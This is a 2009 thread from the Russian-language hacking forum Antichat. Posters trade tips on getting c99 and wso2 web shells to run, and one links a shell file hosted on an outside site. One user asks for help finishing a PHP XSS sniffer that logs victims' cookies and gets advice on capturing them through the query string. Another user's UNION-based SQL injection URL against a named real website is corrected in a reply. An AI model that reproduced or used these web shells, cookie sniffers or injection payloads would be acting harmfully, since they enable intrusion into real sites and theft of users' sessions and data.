ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
15.06.2009, 11:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от Pashkela
2 jokester:
Да, я и не спорю, просто в данном конкретном случае .php не прокатывало никак, на народе, извините, .php не может "исполница"
Вот не работало и всё. Только .txt прокатывало или любое другое расширение, кроме .php
Проверь плиз, может я ваще после выходных с катушек съехал  )
PS: А, дошло, если с99 запороленный - то фиг, wso2 пофигу, поэтому так и подумал
В общем jokester прав как всегда )
загвоздка была в том, чтобы с99 не был запороленный jokester ..у меня тоже такая фигня была....но чем не факт сделать тхт? если получилось , работает)то смысл судить
|
|
|
15.06.2009, 11:45
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Сообщение от HAXTA4OK
но чем не факт сделать тхт? если получилось , работает)то смысл судить дабы не путать новичков и не создавать ложных предрасудков и стереотипов
|
|
|
|
15.06.2009, 11:48
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
HAXTA4OK
Я уже несколько раз говорил, в чём разница. От непонимания возникают новые вопросы. Сделать тупо как показали, не поняв как это работает, это не выход. Советы должны быть максимально простыми и понятными, без лишних наворотов и путаницы
|
|
|
|
15.06.2009, 11:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от Iceangel_
дабы не путать новичков и не создавать ложных предрасудков и стереотипов
и вот ты думаешь что он понял что все ему написали? он просто по примеру сделал с тхт...дык и пусть потом пробует так!. а вот если не получится то спросит..а щас ему тут все понапишут и он вообще не поймет и бросит(не факт)
P.S. он хоть с тхт понял)))) так и пусть делает так
####################################
jokester
Советы должны быть максимально простыми и понятными, без лишних наворотов и путаницы
и вот ты думаешь что он понял что все ему написали?
P.S.пусть идет по ступенькам на примерах
##################################
main()
на тебе шелл ..позаимствовал у mailbrush _http://bestquest.info/shell.txt
Последний раз редактировалось HAXTA4OK; 15.06.2009 в 12:08..
|
|
|
|
15.06.2009, 14:31
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Это от меднета шелл, не от меня |
|
|
|
15.06.2009, 14:47
|
|
Banned
Регистрация: 10.06.2009
Сообщений: 8
Провел на форуме:
23709
Репутация:
6
|
|
Люди помогите плиз. Надо написать самый примитивный снифире XSS на php. читал статью
на ачате про XSS но снифер там какойто мудрённый, с шифрованием,с картинкой и т.д. надо простой сниф и всё может кто накатает. я вот накатал чтото похожее
PHP код:
<?php
$file="log.txt";
$data=date("d.m.Y");
$time=date("H.i");
$ip=trim($_SERVER['REMOTE_ADDR']);
$agent=trim($_SERVER['HTTP_USER_AGENT']);
$fo=fopen($file,"a");
$res="$data|$time|$ip|$agent";
$fw=fputs($fo,$res);
fclose($fo);
?>
но как ему передать куки этому скрипту? |
|
|
|
15.06.2009, 14:51
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сниффер получает даные, переданые GET'oм, т.е. QUERY_STRING. Если сниффер - картинка - он загружается с даными, т.е. куками. Если ты хочешь без картинки - надо будет редиректить.
PS: Юзайте мой сервис http://forum.antichat.ru/thread125329.html
Последний раз редактировалось mailbrush; 15.06.2009 в 14:54..
|
|
|
|
15.06.2009, 14:56
|
|
Banned
Регистрация: 10.06.2009
Сообщений: 8
Провел на форуме:
23709
Репутация:
6
|
|
Сообщение от mailbrush
Сниффер получает даные, переданые GET'oм, т.е. QUERY_STRING. Если сниффер с картинкой - он загружается с даными, т.е. куками. Если ты хочешь без картинки - надо будет редиректить.
PS: Юзайте мой сервис http://forum.antichat.ru/thread125329.html
Помоги плиз изминитиь тот скрипт чтобы он через
QUERY_STRING записывал в файл. и составить url на багу. помогите плиз
|
|
|
|
15.06.2009, 15:26
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
не понимаю в чем ошибка моего запроса, вроде версия 5.0.51a-24-log
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables+where+table_schema=%27ro cit%27--
но ничего хорошего я не вижу.....
|
|
|
|
15.06.2009, 15:29
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от jecka3000
не понимаю в чем ошибка моего запроса, вроде версия 5.0.51a-24-log
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables+where+table_schema=%27ro cit%27--
но ничего хорошего я не вижу.....
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
